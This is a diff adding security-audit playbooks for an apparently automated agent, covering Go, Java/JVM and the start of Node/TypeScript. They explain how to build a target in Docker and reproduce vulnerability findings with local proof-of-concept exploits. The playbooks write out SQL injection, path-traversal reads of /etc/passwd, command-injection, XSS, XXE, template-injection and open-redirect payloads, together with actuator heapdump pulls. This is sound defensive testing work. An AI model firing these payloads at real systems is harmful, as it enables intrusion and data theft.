+one, or probe with `grpcurl` (see Fire the PoC).
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **DB-backed app:** Go projects rarely ship an ORM auto-migrate CLI — check for
+  a migrations dir (`migrations/`, `db/`) and a tool (`golang-migrate`, `goose`,
+  `atlas`), or a `make migrate` / project subcommand. Run it inside the
+  container:
+
+  ```sh
+  docker exec $CN /app migrate 2>/dev/null \
+    || docker exec $CN sh -c 'migrate -path /migrations -database "$DATABASE_URL" up 2>/dev/null' \
+    || true
+  ```
+
+  If the app embeds an in-process SQLite/embedded store, it usually creates the
+  schema on boot — nothing to seed beyond the auth step below.
+
+- **Auth flow:** if the PoC needs a session/token, register or log in via the
+  app's own endpoint with synthetic creds and keep the cookie jar / capture the
+  token:
+
+  ```sh
+  # Cookie-session apps:
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/login"
+
+  # JWT/bearer apps — capture the token for the Authorization header:
+  TOKEN=$(curl -s -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/auth/login" \
+    | python3 -c 'import sys,json;d=json.load(sys.stdin);print(d.get("token") or d.get("access_token",""))')
+  ```
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class:
+
+```sh
+# SQL injection — observe error or extracted marker (Go's database/sql with
+# string-concatenated queries is the classic sink):
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/user?id=1%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / arbitrary file read — http.ServeFile / os.Open on a
+# user-controlled path; pull a file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+# URL-encoded traversal that bypasses naive filepath.Clean-after-join:
+curl -s "http://127.0.0.1:$PORT/static/..%2f..%2f..%2fetc%2fpasswd" | head
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host.
+# Start a canary in a sidecar on $CN's network, then make the app fetch it:
+docker run -d --name va-canary-$FID --network "container:$CN" \
+  python:3-slim python3 -c 'import http.server,socketserver;socketserver.TCPServer(("127.0.0.1",9999),type("H",(http.server.BaseHTTPRequestHandler,),{"do_GET":lambda s:(s.send_response(200),s.end_headers(),s.wfile.write(b"CANARY"))})).serve_forever()'
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/" | grep -o CANARY
+# Also test cloud-metadata SSRF guards WITHOUT leaving the box — the request
+# must stay local; 169.254.169.254 is only a payload string, not a real target.
+
+# Command injection / RCE — os/exec with user input. Prove exec via a benign
+# in-container sentinel, then read it back (NEVER destructive commands).
+# Needs a shell in the runtime image (use debian:12-slim, not distroless):
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# SSTI (html/template misused as text/template, or user-controlled template
+# text) — submit a template expression and observe it evaluated:
+curl -s "http://127.0.0.1:$PORT/render?tpl=%7B%7B.Secret%7D%7D" | tee -a /tmp/poc.$FID.out
+
+# Reflected/stored XSS — text/template or manual string-building bypasses Go's
+# default html/template escaping; confirm the payload is reflected unescaped:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" \
+  | grep -o '<script>alert(1)</script>'
+
+# Open redirect — http.Redirect with a user-controlled Location:
+curl -s -o /dev/null -D- "http://127.0.0.1:$PORT/redirect?next=https://evil.example" \
+  | grep -i '^location:'   # evidence is the header value, no external request made
+
+# gRPC sink — invoke the method with grpcurl against the local container:
+docker run --rm --network "container:$CN" fullstorydev/grpcurl -plaintext \
+  -d '{"id":"1 OR 1=1"}' 127.0.0.1:50051 pkg.Service/Method
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, evaluated template, redirect header, 500 with stack)
+  → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`'s network; no
+outbound connections to real hosts; no real data; side effects are benign
+sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN va-canary-$FID 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID /tmp/va-$FID.iid \
+      /tmp/Dockerfile.$FID.dockerignore /tmp/va-$FID.dockerignore
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`).
+
+1. **Won't serve but builds (library/CLI, or web boot blocked):** drive the
+   vulnerable function directly with a Go test in the SDK image — the
+   highest-fidelity non-server proof. Set `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test if one covers the sink (-run targets it):
+   docker run --rm -v "$WT":/src -w /src golang:1.23-bookworm \
+     go test -run 'TestVulnerable' ./path/to/pkg/...
+
+   # Or drop a one-off harness into the package and run it as a test. Match the
+   # target package's own `package` clause (in-package, so no import of it):
+   cat > "$WT/path/to/pkg/poc_test.go" <<'EOF'
+   package pkg
+   import ("strings"; "testing")
+   func TestPoC(t *testing.T) {
+       out := Vulnerable("<payload>")        // call the vulnerable API
+       if !strings.Contains(out, "<impact-marker>") {
+           t.Fatalf("no impact: %q", out)
+       }
+       t.Logf("IMPACT: %s", out)
+   }
+   EOF
+   docker run --rm -v "$WT":/src -w /src golang:1.23-bookworm \
+     go test -run TestPoC -v ./path/to/pkg/...
+   ```
+
+   For an HTTP handler that won't boot standalone, exercise it in-process with
+   `net/http/httptest` (no real port, no network) — still `method: unit-test`:
+
+   ```go
+   req := httptest.NewRequest("GET", "/download?file=../../etc/passwd", nil)
+   rr := httptest.NewRecorder(); Handler(rr, req)
+   // assert rr.Body contains the leaked content
+   ```
+
+2. **Image builds but the app can't start (missing DB/config/env, cgo dep,
+   private module resolved but service deps absent):** record that
+   `go build` succeeds, `go mod verify` passes, and the vulnerable code is
+   present and reachable, with the line-referenced source→sink trace as
+   evidence. Set `method: build-only`.
+
+   ```sh
+   docker run --rm -v "$WT":/src -w /src golang:1.23-bookworm \
+     sh -c 'go build ./... && echo BUILD_OK; go vet ./... || true'
+   ```
+
+3. **Cannot build at all (toolchain/network blocked, unresolvable private
+   deps):** construct a static PoC — the exact crafted input plus the
+   line-referenced source→sink path showing why it triggers. Set
+   `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/java-jvm.md b/plugins/security/prompts/playbooks/java-jvm.md
new file mode 100644
index 0000000..ae38648
--- /dev/null
+++ b/plugins/security/prompts/playbooks/java-jvm.md
@@ -0,0 +1,491 @@
+# ENV Playbook — Java / JVM
+
+Build, run, and exploit a Java / JVM target (Spring Boot / Spring MVC / Jakarta
+EE / Quarkus / Micronaut / Dropwizard / plain Maven or Gradle library, or a
+Kotlin/Scala/Groovy app) to reproduce a candidate finding with a real PoC.
+Docker-first; the native JDK / Maven / Gradle toolchain may be absent on the
+host. Keep ALL traffic inside the local container — no external hosts, no real
+credentials, no data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls pom.xml build.gradle build.gradle.kts settings.gradle settings.gradle.kts \
+   gradlew mvnw Dockerfile docker-compose.yml 2>/dev/null
+find . -maxdepth 4 \( -name '*.java' -o -name '*.kt' -o -name '*.scala' \
+   -o -name '*.groovy' \) -not -path '*/target/*' -not -path '*/build/*' | head
+```
+
+- **Build tool / manifest:**
+  - `pom.xml` → **Maven**. The `<build>` `<plugins>` and `<parent>` reveal the
+    framework (`spring-boot-starter-parent`, `quarkus-maven-plugin`). Modules are
+    declared in `<modules>`; a multi-module repo has a root `pom.xml` plus
+    per-module `pom.xml`.
+  - `build.gradle` (Groovy DSL) or `build.gradle.kts` (Kotlin DSL) → **Gradle**.
+    `settings.gradle[.kts]` lists sub-projects (`include 'a', 'b'`).
+- **Wrapper present?** `./mvnw` / `./gradlew` pin the exact build-tool version —
+  prefer them over a system `mvn`/`gradle` for reproducibility.
+- **JDK version** — match the image to it. Read it from the manifest:
+
+  ```sh
+  grep -iE 'java\.version|maven\.compiler|<release>|<source>|<target>' pom.xml 2>/dev/null
+  grep -iE 'sourceCompatibility|targetCompatibility|JavaLanguageVersion|languageVersion' \
+    build.gradle build.gradle.kts 2>/dev/null
+  cat .sdkmanrc .tool-versions 2>/dev/null
+  ```
+
+- **Framework tells** (dependencies in the manifest, or `@SpringBootApplication`
+  / annotations):
+  - Spring Boot → `spring-boot-starter*`; entry is a `@SpringBootApplication`
+    `main`, packaged as an executable fat-jar. Default port **8080**.
+  - Spring MVC (classic WAR) → `spring-webmvc` + a `web.xml` / `WEB-INF`;
+    deployed to Tomcat/Jetty. Produces a `*.war`.
+  - Quarkus → `quarkus-*`; runs `java -jar quarkus-app/quarkus-run.jar`, port
+    **8080**.
+  - Micronaut → `io.micronaut*`, port **8080**. Dropwizard → `io.dropwizard`,
+    app port **8080**, admin **8081**.
+  - Jakarta/Java EE → packaged `*.war`/`*.ear`, needs an app server
+    (Tomcat/WildFly/Payara). Heaviest to run live → consider Fallbacks.
+  - Library / SDK (no framework, no `main`, packaging `jar`) → nothing to serve;
+    go to Fallbacks and drive the sink from a JUnit test (`method: unit-test`).
+- **Entry point & packaging** — ground truth for how it runs:
+
+  ```sh
+  grep -rl '@SpringBootApplication\|public static void main' \
+    --include='*.java' --include='*.kt' src 2>/dev/null | head
+  grep -iE '<packaging>|spring-boot-maven-plugin|application\b|mainClass' \
+    pom.xml build.gradle build.gradle.kts 2>/dev/null
+  ```
+
+  `<packaging>jar</packaging>` (or default) + the Spring Boot / Shadow plugin →
+  an executable fat-jar (`java -jar`). `<packaging>war</packaging>` →
+  needs a servlet container.
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Keep the build context lean and out of the host's reach — never copy stale build
+output (`target/`, `build/`) into the image; let the container build fresh. The
+ignore file, named after the 3b Dockerfile so BuildKit applies it, keeps it out:
+
+```sh
+printf '.git\ntarget\nbuild\n.gradle\n*.class\n' > /tmp/Dockerfile.$FID.dockerignore
+```
+
+---
+
+## 3. Build & run (docker-first)
+
+The JVM compile step is heavy and pulls many dependencies. Use BuildKit cache
+mounts (or a mounted local repo) so re-runs are fast, and prefer the wrapper to
+pin the build-tool version.
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up the build, the correct
+fat-jar / WAR, the JVM flags, env, and the DB for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the JDK tag from step 1 (fall back to a recent LTS, e.g. `eclipse-temurin`
+**21**; use **17** or **11** if the manifest targets an older release — a newer
+JDK can reject old source/bytecode). A multi-stage build compiles in a JDK image
+and runs the artifact on a smaller JRE.
+
+**Maven** (builds with the `maven` image's `mvn`; swap in `./mvnw` to pin the wrapper version):
+
+```sh
+cat > /tmp/Dockerfile.$FID <<'EOF'
+# --- build stage ---
+FROM maven:3.9-eclipse-temurin-21 AS build
+WORKDIR /src
+# Copy manifests first for dependency-layer caching (globs tolerate absent files).
+COPY pom.xml ./
+COPY .mvn* .mvn/
+COPY mvnw* ./
+# Pre-fetch deps offline-friendly (cache mount keeps re-runs fast).
+RUN --mount=type=cache,target=/root/.m2 \
+    mvn -B -ntp -q dependency:go-offline || true
+COPY . .
+# Skip tests for the repro build (the audited code, not its test suite, matters).
+RUN --mount=type=cache,target=/root/.m2 \
+    mvn -B -ntp -DskipTests package
+# --- run stage ---
+FROM eclipse-temurin:21-jre
+WORKDIR /app
+# Spring Boot / Shadow fat-jar: the glob must match exactly ONE jar; name it explicitly if *-sources / *-plain exist.
+COPY --from=build /src/target/*.jar /app/app.jar
+EXPOSE 8080
+ENTRYPOINT ["java","-jar","/app/app.jar"]
+EOF
+
+DOCKER_BUILDKIT=1 docker build -f /tmp/Dockerfile.$FID \
+  --iidfile /tmp/va-$FID.iid -t $IMG "$WT"
+```
+
+**Gradle** (swap the build stage):
+
+```sh
+# FROM gradle:8-jdk21 AS build
+# WORKDIR /src
+# COPY . .
+# RUN --mount=type=cache,target=/home/gradle/.gradle \
+#     gradle --no-daemon clean bootJar -x test   # or: shadowJar / build -x test
+# # run stage:
+# COPY --from=build /src/build/libs/*.jar /app/app.jar   # pick the executable jar
+```
+
+Notes that bite on JVM builds:
+
+- A Spring Boot Maven build produces the executable `app.jar` and keeps the thin
+  original as `app.jar.original`; Gradle's `jar` task yields a thin
+  `app-plain.jar` next to the executable one from `bootJar`/`shadowJar`. If the
+  glob grabs the wrong one, `java -jar` fails with `no main manifest attribute`
+  — copy the specific artifact instead.
+- **WAR projects** can't `java -jar`. Either build with Spring Boot's executable
+  WAR (still `java -jar`), or run a servlet container:
+  `FROM tomcat:10-jre21` and `COPY target/*.war /usr/local/tomcat/webapps/ROOT.war`.
+- **Spring Boot's own image build** is often easiest and reproducible:
+  `./mvnw spring-boot:build-image -Dspring-boot.build-image.imageName=$IMG`
+  (or `./gradlew bootBuildImage --imageName=$IMG`) — produces a runnable image
+  without writing a Dockerfile. Try this first if a fat-jar copy is fiddly.
+
+Start command, by how the project runs (the app must bind `0.0.0.0`, not
+`127.0.0.1`, or the mapped host port can't reach it — Spring binds all
+interfaces by default, but `server.address=127.0.0.1` in config overrides that):
+
+- **Spring Boot / Quarkus / Micronaut / Dropwizard fat-jar:** `java -jar
+  /app/app.jar` (the `ENTRYPOINT` above). Dropwizard needs the `server`
+  subcommand + config: `java -jar app.jar server config.yml`.
+- **WAR on a container:** the servlet container's own entrypoint serves it.
+- **Library / no `main`:** nothing to serve → Fallbacks, `method: unit-test`.
+
+---
+
+## 4. Dependencies
+
+Restore reproducibly from the manifest; both tools resolve transitive deps from
+the declared coordinates.
+
+```sh
+# Maven — pre-fetch everything the build needs, then build offline if desired:
+./mvnw -B -ntp dependency:go-offline      # or: mvn ...
+./mvnw -B -ntp -o -DskipTests package     # -o = offline, uses the local repo
+
+# Gradle — resolve dependencies, then build:
+./gradlew --no-daemon dependencies        # forces resolution of all configs
+./gradlew --no-daemon -x test build       # --offline once the cache is warm
+```
+
+- Honor the declared versions exactly; do **not** bump or add deps — that
+  changes the audited dependency set. (Maven `versions:use-latest-releases`,
+  Gradle `--refresh-dependencies` to *upgrade* — avoid both.)
+- **Lockfiles** (when present): Gradle `gradle.lockfile` / `gradle/*.lockfile`
+  pin exact versions — keep `--write-locks` OFF so resolution stays as audited.
+  Maven has no native lockfile; the declared versions (+ any `dependencyManagement`
+  / BOM) are authoritative.
+- **Private/internal repos:** a `<repositories>`/`<server>` in `settings.xml` or
+  a Gradle `maven { url ... }` may need auth. Out of scope — do not supply real
+  credentials. If a dep can't resolve, note it and fall back.
+- **JDK mismatch** is the usual build failure: a build targeting Java 21 features
+  fails under JDK 17 (and vice-versa, old bytecode under a new JDK can warn or
+  fail). Re-read step 1 and pick the matching `eclipse-temurin` tag.
+- The BuildKit `--mount=type=cache` for `~/.m2` / `~/.gradle` makes re-builds
+  fast; alternatively bind-mount a host cache:
+  `-v "$HOME/.m2":/root/.m2` (read-only is safest: `:ro`).
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:8080 \
+  -e SERVER_PORT=8080 -e SERVER_ADDRESS=0.0.0.0 \
+  $IMG
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Map the
+container port (`:8080`) to whatever the code actually listens on — read it from
+`application.properties` / `application.yml` (`server.port`), env, or the
+framework default (Spring Boot / Quarkus / Micronaut / Dropwizard app **8080**;
+Dropwizard admin **8081**; a Tomcat container **8080**). Spring honors
+`SERVER_PORT` / `SERVER_ADDRESS` env (relaxed binding) — pass them if the config
+hardcodes a loopback bind.
+
+**If the app binds `127.0.0.1` inside the container** (e.g. `server.address`
+config), a `-p` map can't reach it (loopback is per-namespace). Either fire the
+PoC from inside the container (`docker exec $CN ...`; the temurin JRE image has a
+shell), or run with `--network host` on Linux so the container's loopback is the
+host's:
+
+```sh
+docker run -d --name $CN --network host $IMG    # then target 127.0.0.1:<code-port>
+```
+
+Confirm it is up — JVM apps boot slowly (cold JIT, Spring context); poll
+generously, don't sleep blindly:
+
+```sh
+for i in $(seq 1 60); do
+  curl -sS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  # Spring Boot Actuator (if on the classpath) gives a clean readiness signal:
+  curl -fsS "http://127.0.0.1:$PORT/actuator/health" 2>/dev/null | grep -q UP && { echo up; break; }
+  sleep 2
+done
+docker logs --tail 80 $CN          # inspect boot errors if curl never succeeds
+```
+
+A 404 / 401 / 403 on `/` still means the server is up — any HTTP response counts
+as healthy. Look for the framework boot line in the logs (Spring's `Started
+<App> in N seconds` / `Tomcat started on port(s): 8080`, Quarkus's `Listening on:
+http://0.0.0.0:8080`, Micronaut's `Startup completed`). A boot that hangs is
+usually a missing DB/broker dependency — see Seed, or fall back.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **DB-backed app:** Spring Boot with an embedded H2 (`spring.datasource.url=
+  jdbc:h2:mem:...`) or `spring.jpa.hibernate.ddl-auto=create`/`update` creates
+  the schema on boot — nothing to seed. For Flyway/Liquibase, migrations run
+  automatically at startup. If it points at an external Postgres/MySQL, start a
+  sidecar on the container's network and point the app at it (synthetic creds
+  only):
+
+  ```sh
+  docker run -d --name va-db-$FID --network "container:$CN" \
+    -e POSTGRES_PASSWORD=poc -e POSTGRES_DB=app postgres:16-alpine
+  # then run with: -e SPRING_DATASOURCE_URL=jdbc:postgresql://127.0.0.1:5432/app \
+  #                -e SPRING_DATASOURCE_USERNAME=postgres -e SPRING_DATASOURCE_PASSWORD=poc
+  ```
+
+  An app-shipped seed import (`data.sql`, `import.sql`, a CommandLineRunner) runs
+  on boot — let it.
+
+- **Auth flow:** if the PoC needs a session/token, register or log in via the
+  app's own endpoint with synthetic creds and keep the cookie jar / capture the
+  token:
+
+  ```sh
+  # Spring Security form login (cookie session):
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -d 'username=poc&password=Poc-Passw0rd!' \
+    "http://127.0.0.1:$PORT/login"
+
+  # JSON login → JWT/bearer; capture the token for the Authorization header:
+  TOKEN=$(curl -s -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/api/auth/login" \
+    | python3 -c 'import sys,json;d=json.load(sys.stdin);print(d.get("token") or d.get("access_token") or d.get("accessToken",""))')
+  ```
+
+  Spring Boot dev sometimes prints a generated default password to the log
+  (`Using generated security password: ...`) — read it from `docker logs $CN`
+  for a `user` login when no registration endpoint exists.
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class (several map to the
+JVM-classic vuln families):
+
+```sh
+# SQL injection — string-concatenated JDBC / a misused JPA query; observe error
+# or extracted marker:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/users?id=1%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / arbitrary file read — Files.newInputStream / new File(userPath),
+# or a ResourceHandler; pull a file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+# Encoded traversal that bypasses naive normalize-after-concat:
+curl -s "http://127.0.0.1:$PORT/files/..%2f..%2f..%2fetc%2fpasswd" | head
+
+# Insecure deserialization — the JVM signature class. Java native
+# (ObjectInputStream), Jackson polymorphic typing, SnakeYAML, XStream, etc.
+# Prove via a BENIGN in-container sentinel gadget — never a destructive payload.
+# e.g. trigger a class-load / process touch you can read back:
+curl -s -X POST -H 'Content-Type: application/json' \
+  --data-binary @/tmp/poc-gadget.$FID.json "http://127.0.0.1:$PORT/api/import"
+docker exec $CN ls -l /tmp/va-pwned 2>&1   # benign marker the gadget created
+
+# SSTI — Thymeleaf/Freemarker/Velocity/SpEL with user-controlled template text.
+# Submit an expression and observe it evaluated server-side:
+# SpEL: ${T(java.lang.Runtime).getRuntime()...}  Thymeleaf: __${...}__::.x
+curl -s "http://127.0.0.1:$PORT/render?name=%24%7B7*7%7D" | grep -o '49'
+
+# XXE — XML parser without FEATURE_SECURE_PROCESSING / external-entity disabled.
+# Use a LOCAL file or a container-local listener, never a remote URL:
+curl -s -X POST -H 'Content-Type: application/xml' --data-binary @- \
+  "http://127.0.0.1:$PORT/api/xml" <<'XML' | head
+<?xml version="1.0"?>
+<!DOCTYPE r [ <!ENTITY x SYSTEM "file:///etc/hostname"> ]>
+<r>&x;</r>
+XML
+
+# OS command injection — Runtime.exec / ProcessBuilder with user input. Benign
+# in-container sentinel, then read it back:
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host.
+# Start a canary sharing $CN's network namespace, then make the app fetch it:
+docker run -d --name va-canary-$FID --network "container:$CN" \
+  python:3-slim python3 -c 'import http.server,socketserver;socketserver.TCPServer(("127.0.0.1",9999),type("H",(http.server.BaseHTTPRequestHandler,),{"do_GET":lambda s:(s.send_response(200),s.end_headers(),s.wfile.write(b"CANARY"))})).serve_forever()'
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/" | grep -o CANARY
+# 169.254.169.254 (cloud metadata) is only a payload STRING here — the request
+# must stay local; never actually reach an external/metadata endpoint.
+
+# Reflected/stored XSS — a template/response that emits user input unescaped:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" \
+  | grep -o '<script>alert(1)</script>'
+
+# Open redirect — sendRedirect / RedirectView with a user-controlled target:
+curl -s -o /dev/null -D- "http://127.0.0.1:$PORT/redirect?next=https://evil.example" \
+  | grep -i '^location:'   # evidence is the header value, no external request made
+
+# Actuator exposure (Spring Boot misconfig) — sensitive endpoints reachable:
+curl -s "http://127.0.0.1:$PORT/actuator/env" | head
+curl -s "http://127.0.0.1:$PORT/actuator/heapdump" -o /tmp/poc.$FID.hprof && ls -l /tmp/poc.$FID.hprof
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, evaluated expression `49`, XXE-leaked file, redirect
+  header, exposed actuator data, 500 with a Java stack trace) → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`'s network; no
+outbound connections to real hosts; no real data; deserialization / command /
+SSRF payloads create only benign in-container sentinels, never destructive or
+exfiltrating ones.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN va-canary-$FID va-db-$FID 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/poc.$FID.hprof \
+      /tmp/poc-gadget.$FID.json /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/va-$FID.iid
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`).
+
+1. **Won't serve but builds (library, WAR needing a full app server, or web boot
+   blocked):** drive the vulnerable method directly with a JUnit test in the
+   build image — the highest-fidelity non-server proof. Set `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test if one covers the sink:
+   docker run --rm -v "$WT":/src -w /src maven:3.9-eclipse-temurin-21 \
+     mvn -B -ntp -Dtest=VulnerableTest test
+   # Gradle:
+   docker run --rm -v "$WT":/src -w /src gradle:8-jdk21 \
+     gradle --no-daemon test --tests '*Vulnerable*'
+
+   # Or drop a one-off harness test that calls the vulnerable API and asserts impact.
+   # Place it under src/test/java/<pkg> matching the target's package:
+   cat > "$WT/src/test/java/com/example/PoCTest.java" <<'EOF'
+   package com.example;
+   import org.junit.jupiter.api.Test;
+   import static org.junit.jupiter.api.Assertions.*;
+   class PoCTest {
+       @Test void poc() throws Exception {
+           String out = new Vulnerable().handle("<payload>");   // call the sink
+           assertTrue(out.contains("<impact-marker>"), "no impact: " + out);
+           System.out.println("IMPACT: " + out);
+       }
+   }
+   EOF
+   docker run --rm -v "$WT":/src -w /src maven:3.9-eclipse-temurin-21 \
+     mvn -B -ntp -Dtest=PoCTest test
+   ```
+
+   For a Spring controller that won't boot the full context, exercise it with
+   `MockMvc` / `@WebMvcTest` (slice test — no real port, no network), or stand up
+   the app in-process with `@SpringBootTest(webEnvironment=RANDOM_PORT)` +
+   `TestRestTemplate`. Still `method: unit-test`.
+
+2. **Image builds but the app can't start (missing DB/broker/config, app-server
+   dependency, private repo resolved but service deps absent):** record that the
+   build succeeds (`package` produced the artifact), the dependency set resolves,
+   and the vulnerable code is present and reachable, with the line-referenced
+   source→sink trace as evidence. Set `method: build-only`.
+
+   ```sh
+   docker run --rm -v "$WT":/src -w /src maven:3.9-eclipse-temurin-21 \
+     mvn -B -ntp -DskipTests package    # or: gradle --no-daemon assemble -x test
+   ```
+
+3. **Cannot build at all (toolchain/network blocked, unresolvable private deps,
+   JDK mismatch that can't be reconciled):** construct a static PoC — the exact
+   crafted input plus the line-referenced source→sink path showing why it
+   triggers. Set `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/node.md b/plugins/security/prompts/playbooks/node.md
new file mode 100644
index 0000000..aa8f450
--- /dev/null
+++ b/plugins/security/prompts/playbooks/node.md
@@ -0,0 +1,339 @@
+# ENV Playbook — Node / TypeScript
+
+Build, run, and exploit a Node / TypeScript target (Express / Next / Nest /
+Fastify / Koa / plain package) to reproduce a candidate finding with a real PoC.
+Docker-first; the native Node / TS toolchain may be absent on the host. Keep ALL
+traffic inside the local container — no external hosts, no real credentials, no
+data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls package.json package-lock.json pnpm-lock.yaml yarn.lock tsconfig.json 2>/dev/null
+find . -maxdepth 3 \( -name '*.ts' -o -name '*.tsx' -o -name '*.js' -o -name '*.mjs' \) \
+  -not -path '*/node_modules/*' | head
+```
+
+- **Manifests:** `package.json` (always). Lockfile picks the package manager:
+  `package-lock.json` → npm, `pnpm-lock.yaml` → pnpm, `yarn.lock` → yarn.
+- **TypeScript:** `tsconfig.json` and `*.ts`/`*.tsx`. Compiled via `tsc`,
+  `ts-node`/`tsx` (run TS directly), or a bundler (esbuild/swc/webpack/vite).
+- **Framework tells** (`dependencies` in `package.json`, or imports):
+  - Express → `express`; entry often `app.js`/`server.js`/`src/index.ts`.
+  - Fastify → `fastify`. Koa → `koa`. Hapi → `@hapi/hapi`.
+  - NestJS → `@nestjs/core`; entry `main.ts`, bootstraps on `3000`.
+  - Next.js → `next` + a `next.config.*`; `pages/` or `app/` dir.
+  - Library (no server) → no framework dep, has a `main`/`exports`/`bin` field.
+- **Entry & scripts:** read `package.json` `scripts` (`start`, `dev`, `build`)
